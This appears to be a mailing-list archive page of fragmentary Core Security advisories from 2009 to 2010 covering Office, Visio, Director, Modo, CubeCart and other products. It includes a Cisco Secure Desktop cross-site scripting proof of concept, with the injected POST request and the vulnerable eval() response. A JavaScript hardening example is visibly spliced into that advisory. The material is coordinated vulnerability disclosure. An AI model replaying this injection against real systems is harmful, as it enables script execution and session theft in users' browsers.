[4] Basic elements: LListL
[http://software.frodo.looijaard.name/psiconv/formats/Basic_Elements.html#LListL]
[5] Paint Data Section
[http://software.frodo.looijaard.name/psiconv/formats/Paint_Data_Section.html#Paint%20Data%20Section]


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://corelabs.coresecurity.com/].


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].



[Full-disclosure] [CORE-2010-0415] SQL Injection in CubeCart PHP Free Commercial Shopping Cart Application

2010-06-08 Thread CORE Security Technologies Advisories
, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980
or on the Web at [http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].



Re: [Full-disclosure] [CORE-2010-0405] Adobe Director Invalid Read

2010-05-13 Thread Core Security Technologies Advisories

Core Security Technologies Advisories

Errata:

The vulnerability in advisory CORE-2010-0405 was incorrectly described
as an Invalid read, when it is really a Memory corruption vulnerability.

Updated Title:
Adobe Director DIRAPI.DLL Memory Corruption Vulnerability

Updated URL:
http://www.coresecurity.com/content/adobe-director-memory-corruption



[Full-disclosure] [CORE-2010-0405] Adobe Director Invalid Read

2010-05-11 Thread Core Security Technologies Advisories Team
 Arg2 = 0012F5EC
0012E6BC    Arg3 = 
0012E6C0   001A Arg4 = 001A
0012E6DC   2018BB23   JMP.DIRAPI.#88Director.2018BB1E
0012E83C   2027E776   ? Director.2018BAB0  Director.2027E771
- -/



9. *Report Timeline*

. 2010-04-14:
Vendor contacted.

. 2010-04-14:
Vendor requests PoC file.

. 2010-04-14:
Core replies with the PoC file and the draft advisory.

. 2010-04-14:
Adobe replies that it will investigate the issue and sets a preliminary
release date of June/July.

. 2010-04-15:
Core agrees with the preliminary release date.

. 2010-04-28:
Core requests an update on the situation, and asks whether Adobe was
able to confirm if the bug is exploitable.

. 2010-04-28:
Adobe replies that the issue was investigated and is scheduled to be
fixed in the next release of Adobe Shockwave Player, planned for May;
they did not carry out further exploitability research.

. 2010-04-28:
Core requests a specific publication date for the fix.

. 2010-05-06:
Adobe informs Core that the release date for the fix has been set to May
11th.

. 2010-05-07:
Core asks Adobe if they want to provide the text for the Solutions and
Workarounds section of the advisory.

. 2010-05-07:
Adobe replies with the text for the Solutions and Workarounds section
of the advisory.

. 2010-05-11:
Advisory published.



10. *References*

[1] Adobe Security Bulletin [http://www.adobe.com/go/apsb10-12/].


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies. We conduct our research in several important
areas of computer security including system vulnerabilities, cyber
attack planning and simulation, source code auditing, and cryptography.
Our results include problem formalization, identification of
vulnerabilities, novel solutions and prototypes for new technologies.
CoreLabs regularly publishes security advisories, technical papers,
project information and shared software tools for public use at:
[http://www.coresecurity.com/corelabs].


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
[http://www.coresecurity.com].


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkvptp4ACgkQyNibggitWa2lwACgo9oRhMUsmUe+IH3jdK9d7B+m
ebMAn1iAO1mYBqXGrm67F2oCxTd+OEe3
=s6Ek
-----END PGP SIGNATURE-----


[Full-disclosure] [CORE-2010-0428] Microsoft Office Visio DXF File Insertion Buffer Overflow

2010-05-04 Thread Core Security Technologies Advisories Team

13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no  fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iEYEARECAAYFAkvgbUoACgkQyNibggitWa3GTQCfT8WvlRzJ5JIs8aZV1YXoyGLB
gQIAnRFEX6sGm6I5w+lCkxO642UzM0kf
=++e0
-----END PGP SIGNATURE-----


[Full-disclosure] [CORE-2010-0427] Windows SMTP Service DNS query Id vulnerabilities

2010-05-04 Thread Core Security Technologies Advisories
-08-Kaminsky-DNS08-BlackOps.pdf]
[9] Hubert, A., van Mook, R., Measures for Making DNS More Resilient
against Forged Answers, RFC-5452, 2009.
[http://tools.ietf.org/html/rfc5452]


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAkvgnyEACgkQyNibggitWa2SyQCfdWpNuMmlU8Ye1eE0uSII5f+G
mmwAnj4hejHo/gnLh8qF/EhHBJHvvijS
=VxJA
-----END PGP SIGNATURE-----


[Full-disclosure] CORE-2010-0406 - User Invoices Persistent XSS Vulnerability in CactuShop

2010-04-21 Thread CORE Security Technologies Advisories

12. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
 
iEYEARECAAYFAkvPP5wACgkQyNibggitWa1yQgCgn+7/QWBsftCpgloXlQQMirnG
jVAAoKs0PoyxVRtYCwzYyunWugg6grtl
=E4Fs
-----END PGP SIGNATURE-----


[Full-disclosure] CORE-2010-0323: XSS Vulnerability in NextGEN Gallery Wordpress Plugin

2010-04-06 Thread CORE Security Technologies Advisories

13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: GnuPT v3.6.3
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
 
iEYEARECAAYFAku7mowACgkQyNibggitWa3vfQCeP8eGzt/eGSrAREsNRfrGsaLs
8UEAnAuRs9cgmZkfeq1DU8BCNoxLgFFI
=wL6j
-----END PGP SIGNATURE-----


[Full-disclosure] CORE-2009-0803: Virtual PC Hypervisor Memory Protection Vulnerability

2010-03-16 Thread CORE Security Technologies Advisories

13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkuf5fwACgkQyNibggitWa2IuwCeJitqH31/htKYFIuoeXVVbmmN
lscAn1z+fpwqI7rbHnJbjRujiZ3mfJOJ
=hgB9
-----END PGP SIGNATURE-----


[Full-disclosure] CORE-2009-0813: Windows Movie Maker and Microsoft Producer IsValidWMToolsStream() Heap Overflow

2010-03-09 Thread CORE Security Technologies Advisories
.

. 2010-03-09:
Microsoft Security Bulletin MS10-016 [2] is released, which fixes the
vulnerability in Movie Maker.

. 2010-03-09:
The advisory CORE-2009-0813 is published as user release.



10. *References*

[1] About Core Security's Bugweek
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=project&name=Bugweek
[2] Microsoft Security Bulletin MS10-016
http://www.microsoft.com/technet/security/Bulletin/MS10-016.mspx


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkuWvrcACgkQyNibggitWa1XQACeI3uhCN5nVjAjseSZpRh0R2Bn
0T4An2XAB94FkLyN0Pq5G3NWzOzM9Ibq
=efAg
-----END PGP SIGNATURE-----


[Full-disclosure] CORE-2009-1103: Microsoft Office Excel DbOrParamQry Record Parsing Vulnerability

2010-03-09 Thread CORE Security Technologies Advisories
:
The advisory CORE-2009-1103 is published.



10. *References*

[1] Microsoft Security Bulletin MS10-017
http://www.microsoft.com/technet/security/Bulletin/MS10-017.mspx
[2] MSDN DbOrParamQry entry
http://msdn.microsoft.com/en-us/library/dd953289.aspx


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkuWvzgACgkQyNibggitWa3sgQCfW9M7pPRWJ82ytbaY0V8rJh6W
3/4AmwQbyIyX8Lg2FPDrzetOCkgybb35
=HNzF
-----END PGP SIGNATURE-----


[Full-disclosure] CORRECTION: CORE-2009-0913 - Luxology Modo 401 .LXO Integer Overflow

2010-03-03 Thread CORE Security Technologies Advisories
  or   ?   ?R @
01B0:  47 00 3F 80-00 00 42 00-3F 80 00 00-43 48 4E 4C  G ?Ç  B
?Ç  CHNL
01C0:  00 12 62 75-67 68 65 72-65 00 00 01-70 6E 78 21   ?bughere
?pnx!

- -/



8. *Report Timeline*

. 2009-11-06:
Core completes the support form trying to reach a security contact.

. 2009-11-13:
Luxology LLC support team does not respond to any mail. Core contacts
CERT trying to reach a valid security contact at Luxology LLC.

. 2009-11-16:
CERT acknowledges the communication, and Core reschedules the advisory
to November 30th, 2009 based on CERT's recommendations.

. 2010-03-01:
No response from Luxology LLC.

. 2010-03-02:
The advisory CORE-2009-0913 is published.



9. *References*

[1] The authors participated in Core Bugweek 2009 as members of the
team Gimbal Lock N Load.
[2] http://www.luxology.com/modo/
[3] http://www.luxology.com/
[4] http://www.martinreddy.net/gfx/2d/IFF.txt


12. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
 
iEYEARECAAYFAkuOmH0ACgkQyNibggitWa2QNgCfXfVi/vYAPK2u3xIBbkZ9sgbK
CqEAoK7tSDlCbk9E2kmlID8BLK8itBKD
=pxSB
-----END PGP SIGNATURE-----


[Full-disclosure] Luxology Modo 401 .LXO Integer Overflow

2010-03-02 Thread CORE Security Technologies Advisories
 00 00-43 48 4E 4C  G ?Ç  B
?Ç  CHNL
01C0:  00 12 62 75-67 68 65 72-65 00 00 01-70 6E 78 21   ?bughere
?pnx!

- -/



8. *Report Timeline*

. 2009-11-06:
Core completes the support form trying to reach a security contact.

. 2009-11-13:
Luxology LLC support team does not respond to any mail. Core contacts
CERT trying to reach a valid security contact at Luxology LLC.

. 2009-11-16:
CERT acknowledges the communication, and Core reschedules the advisory
to November 30th, 2009 based on CERT's recommendations.

. 2009-03-01:
No response from Luxology LLC.

. 2009-03-02:
The advisory CORE-2009-0913 is published.



9. *References*

[1] The authors participated in Core Bugweek 2009 as members of the
team Gimbal Lock N Load.
[2] http://www.luxology.com/modo/
[3] http://www.luxology.com/
[4] http://www.martinreddy.net/gfx/2d/IFF.txt


12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper
credit is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v2.0.12 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/
 
iEYEARECAAYFAkuNb5cACgkQyNibggitWa12/ACcC02DZ6CO4m4rGbtHxNTw97Xu
D80Anjwp3e0eHeNHzEmRQr/zIS/vBFKK
=FwUB
-----END PGP SIGNATURE-----


[Full-disclosure] CORE-2009-0827: Microsoft Office Excel / Word OfficeArtSpgr Container Pointer Overwrite Vulnerability

2010-02-09 Thread CORE Security Technologies Advisories
 for the vulnerability MSRC 9368 in
MSO.dll is still February 9th 2010 (the spreadsheet contained a clerical
error).

. 2010-02-01:
Core requests MSRC the list of non vulnerable versions of Excel /
Office, and a statement for the vendor information section of the
advisory.

. 2010-02-03:
Microsoft sends the CVE identifier for the vulnerability, and the list
of affected and non affected software.

. 2010-02-09:
The advisory CORE-2009-0827 is published.



10. *References*

[1] About Core Security's Bugweek
http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=project&name=Bugweek
[2] Microsoft Security Bulletin MS10-003
http://www.microsoft.com/technet/security/bulletin/MS10-003.msp


13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAktxq9cACgkQyNibggitWa2ZfgCgsgImwlV9D+uNQnuzgmWefT8U
BngAn06q1Ub1HhaqeKBigZaI3SCCPFg3
=Cmi1
-----END PGP SIGNATURE-----


[Full-disclosure] [CORE-2010-0121] Multiple Vulnerabilities with 8.3 Filename Pseudonyms in Web Servers

2010-02-05 Thread CORE Security Technologies Advisories

13. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAktsincACgkQyNibggitWa3Z5ACfYMSjRozwndnvWAldcCRo5W5C
kUEAnjY2dmFWup/6s1GV9vALr3u1Wbfy
=MTyQ
-----END PGP SIGNATURE-----


[Full-disclosure] CORE-2009-0625: Internet Explorer Dynamic OBJECT tag and URLMON sniffing vulnerabilities

2010-02-03 Thread Core Security Technologies Advisories
/content/ie-security-zone-bypass

[3] Understanding and Working in Protected Mode Internet Explorer.
 http://msdn.microsoft.com/en-us/library/bb250462(VS.85).aspx

[4] Protected Mode for IE7 in Windows Vista - Is it On or Off?
http://blogs.msdn.com/ie/archive/2007/04/04/protected-mode-for-ie7-in-windows-vista-is-it-on-or-off.aspx

[5] Jorge Luis Alvarez Medina, Abusing Insecure Feature of Internet
Explorer, Feb. 2010
http://corelabs.coresecurity.com/index.php?module=wiki%38action=attachment%38type=publication%38page=Abusing_insecure_features_of_Internet_Explorer-article.pdf

[6] Jorge Luis Alvarez Medina, Internet Explorer turns your personal
computer into a public File Server, BlackHat Technical Security
conference, Feb. 2010, Washington D.C., USA.
 
http://corelabs.coresecurity.com/index.php?module=wiki%38action=attachment%38type=publication%38page=Abusing_insecure_features_of_Internet_Explorer-BHDC2010-Slides.pdf

[7] Wikipedia, Trident (layout engine).
http://en.wikipedia.org/wiki/Trident_(layout_engine)

[8] Microsoft Security Bulletin MS09-019, Cumulative Security Update for
Internet Explorer, June 10 2009.
http://www.microsoft.com/technet/security/Bulletin/MS09-019.mspx


13. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Core Security
Technologies and (c) 2009 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.

14. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)

iEYEARECAAYFAktp59YACgkQyNibggitWa3e/ACfS+zHvcSqTFyJrqR6D1fTKk6O
GoUAmQEk6qwbnHFaodbAhQOw8kaPtuTO
=/WSE
-----END PGP SIGNATURE-----



[Full-disclosure] [CORE-2010-0106] Cisco Secure Desktop XSS/JavaScript Injection

2010-02-01 Thread Core Security Technologies Advisories
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

  Core Security Technologies - CoreLabs Advisory
   http://www.coresecurity.com/corelabs/

Cisco Secure Desktop XSS/JavaScript Injection



1. *Advisory Information*

Title: Cisco Secure Desktop XSS/JavaScript Injection
Advisory Id: CORE-2010-0106
Advisory URL: http://www.coresecurity.com/content/cisco-secure-desktop-xss
Date published: 2010-02-01
Date of last update: 2010-02-01
Vendors contacted: Cisco
Release mode: Coordinated release



2. *Vulnerability Information*

Class: Cross site scripting [CWE-79]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
Bugtraq ID: 37960
CVE Name: CVE-2010-0440



3. *Vulnerability Description*

The Cisco Secure Desktop web application does not sufficiently verify if
a well-formed request was provided by the user who submitted the POST
request, resulting in a cross-site scripting vulnerability.

For the attack to succeed, the Secure Desktop application on the Cisco
appliance must be turned on.


4. *Vulnerable packages*

   . Cisco Secure Desktop 3.4.2048
   . Older versions are probably affected too, but they were not checked.


5. *Non-vulnerable packages*

   . Cisco Secure Desktop 3.5.841


6. *Vendor Information, Solutions and Workarounds*

Cisco Security Alert:
http://tools.cisco.com/security/center/viewAlert.x?alertId=19843


7. *Credits*

This vulnerability was discovered and researched by Matias Pablo Brutti
from Core Security Technologies.

The publication of this advisory was coordinated by Jorge Lucangeli Obes
from Core Security Technologies Advisories Team.


8. *Technical Description / Proof of Concept Code*

Cross-site scripting (XSS) vulnerabilities allow an attacker to execute
arbitrary scripting code in the context of the user's browser (in the
vulnerable application's domain). For example, an attacker could exploit
an XSS vulnerability to steal user cookies (and then impersonate the
legitimate user) or present a fake page requesting information from the
user (e.g. credentials). This vulnerability occurs when user-supplied
data is displayed without encoding.

The Cisco Secure Desktop web application does not sufficiently verify if
a well-formed request was provided by the user who submitted the POST
request. The cross-site scripting vulnerability was found in the
following file/URL:

/-----
https://{IP}//+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us

-----/

using the POST variable:

/-----
Starting, please wait...<script>alert(1);</script>

-----/

The content of the POST field is not encoded when it is written into the
HTML output, which allows an attacker who controls that content to insert
JavaScript code. Furthermore, JavaScript code could also be injected into
the 'start.html' page, because the content of the POST request above is
used in 'binary/mainv.js' as input to an 'eval()' call. This lets an
attacker inject code without restriction, and that code is executed in
the context of the 'eval()' call:

/-----
http_request.open('POST', path, false);
http_request.send(msgs);
var trans = new Array();
try {
    eval(http_request.responseText);
} catch (e) {}

-----/



8.1. *Proof of Concept*



/-----
REQUEST:
POST https://{IP}/+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us HTTP/1.1
Host: {IP}
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: https://{IP}/CACHE/sdesktop/install/start.htm
Content-Type: application/xml; charset=UTF-8
Cookie: webvpnLang=en-us; webvpnlogin=1
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 56

Starting, please wait...<script>alert(1);</script>

RESPONSE:
HTTP/1.1 200 OK
Server: Cisco AWARE 2.0
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache
Pragma: no-cache
Connection: Keep-Alive
Date: Mon, 16 Nov 2009 14:14:07 GMT
Content-Length: 122

trans["Starting, please wait...\<script>alert(1);</script>"] =
"Starting, please wait...\<script>alert(1);</script>";

-----/
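The response pattern described above, modelled as an added JavaScript example (this is not Cisco's code): the catalog, `buildLegacyResponse`, `buildJsonResponse` and `parseTranslationResponse` are constructed stand-ins for the appliance's translation endpoint and for the `eval(http_request.responseText)` call in 'binary/mainv.js'. It shows why the fix is to return data (JSON) and parse it on the client, instead of returning a JavaScript statement built from the request body and evaluating it.

```javascript
// Added example: not Cisco's code. It models the translation endpoint the
// advisory describes in two ways. The legacy builder concatenates the raw
// POST body into a JavaScript statement that the client then eval()s; the
// hardened pair returns JSON and parses it, so the body is only ever data.

// Constructed translation catalog standing in for the appliance's own.
const CATALOG = {
  "Starting, please wait...": "Starting, please wait...",
};

function lookup(msg) {
  return Object.prototype.hasOwnProperty.call(CATALOG, msg) ? CATALOG[msg] : msg;
}

// Vulnerable pattern (illustration of the flaw, not the appliance's source):
// the untrusted message becomes part of a JS statement, so quotes,
// backslashes and a closing </script> tag inside it survive unescaped.
function buildLegacyResponse(msg) {
  return 'trans["' + msg + '"] = "' + lookup(msg) + '";';
}

// Hardened server side: emit data, not code. JSON.stringify escapes quotes,
// backslashes and control characters; "</" is additionally written as "<\/"
// so the text can never close an enclosing <script> block if the JSON is
// ever inlined into HTML.
function buildJsonResponse(msg) {
  const body = JSON.stringify({ [msg]: lookup(msg) });
  return body.replace(/<\//g, "<\\/");
}

// Hardened client side: JSON.parse instead of eval(responseText). Only
// string-valued own properties are copied into a prototype-less table, so
// a key such as "__proto__" cannot reach Object.prototype.
function parseTranslationResponse(text) {
  const trans = Object.create(null);
  const parsed = JSON.parse(text);
  for (const key of Object.keys(parsed)) {
    if (typeof parsed[key] === "string") trans[key] = parsed[key];
  }
  return trans;
}

// Check used in the demo: does the response text still carry a literal
// closing script tag that would terminate a <script> block?
function canCloseScriptBlock(text) {
  return /<\/script>/i.test(text);
}

// Demo run with the advisory's proof-of-concept message.
const POC_MESSAGE = "Starting, please wait...<script>alert(1);</script>";
if (typeof require !== "undefined" && require.main === module) {
  console.log(buildLegacyResponse(POC_MESSAGE));
  console.log(buildJsonResponse(POC_MESSAGE));
  console.log(parseTranslationResponse(buildJsonResponse(POC_MESSAGE)));
}
```

With the proof-of-concept message, the legacy builder returns a statement containing a live `</script>`, while the JSON response contains only `<\/script>` and, after `JSON.parse`, yields the message back as an ordinary string value that the client can place in the page with `textContent`.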



9. *Report Timeline*

. 2010-01-12:
Vendor contacted.

. 2010-01-12:
Cisco replies, saying that it will investigate the report.

. 2010-01-12:
Cisco tentatively acknowledges the February 5th release date.

. 2010-01-13:
Core replies, reassuring that the release date can be moved if Cisco
can't meet it.

. 2010-01-13:
Cisco updates, pointing to a beta version of Cisco Secure Desktop that
contains a fix for the vulnerability.

. 2010-01-13:
Cisco describes the fix and the non-vulnerable versions of the package.

. 2010-01-14:
Cisco confirms the February 5th release date.

. 2010-01-14:
Core acknowledges this release

[Full-disclosure] [CORE-2009-1126] Corel Paint Shop Pro Photo X2 FPX Heap Overflow

2010-02-01 Thread CORE Security Technologies Advisories
.


11. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and software
security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core
Security Technologies can be reached at 617-399-6980 or on the Web at
http://www.coresecurity.com.


12. *Disclaimer*

The contents of this advisory are copyright (c) 2010 Core Security
Technologies and (c) 2010 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.


13. *PGP/GPG Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAktnPikACgkQyNibggitWa2BxgCfYtSY/FIhVjOtPxriGUpmReS/
tdoAnA0zeotWIo3c7UkokdVq2UIi+4yk
=Onam
-----END PGP SIGNATURE-----



[Full-disclosure] CORE-2009-1013: Multiple XSS and Injection Vulnerabilities in TestLink Test Management and Execution System

2009-12-09 Thread CORE Security Technologies Advisories
and fixing them. Core suggests that the developers actually in charge
of these issues be copied on the e-mail loop, or that they be given
access to internal issue-tracking tools so they can actively participate
in the discussions and the patching process.

. 2009-11-30:
Martin Havlat asks for technical details needed by him to confirm some
of these vulnerabilities.

. 2009-12-01:
Core replies with the technical details needed by Martin Havlat.

. 2009-12-02:
Martin Havlat sends a patched version of TestLink to Core asking for
verification of fixes to some of the vulnerabilities reported in this
advisory.

. 2009-12-03:
Core replies saying that the fixes proposed by Martin Havlat fail to
patch those specific vulnerabilities. The bugs are further researched
by Core and the advisory draft is modified to include a more detailed
explanation of these bugs. This technical information is shared by
Core with Martin Havlat and some insight into possible fixes is also
given.

. 2009-12-09:
TestLink 1.8.5 is released.

. 2009-12-09:
Advisory CORE-2009-1013 is published.


10. *References*

[1] http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
[2] http://www.teamst.org/
[3] http://www.owasp.org/index.php/PHP_Top_5


11. *About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is
charged with anticipating the future needs and requirements for
information security technologies. We conduct our research in several
important areas of computer security including system vulnerabilities,
cyber attack planning and simulation, source code auditing, and
cryptography. Our results include problem formalization,
identification of vulnerabilities, novel solutions and prototypes for
new technologies. CoreLabs regularly publishes security advisories,
technical papers, project information and shared software tools for
public use at: http://www.coresecurity.com/corelabs.


12. *About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources
are exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
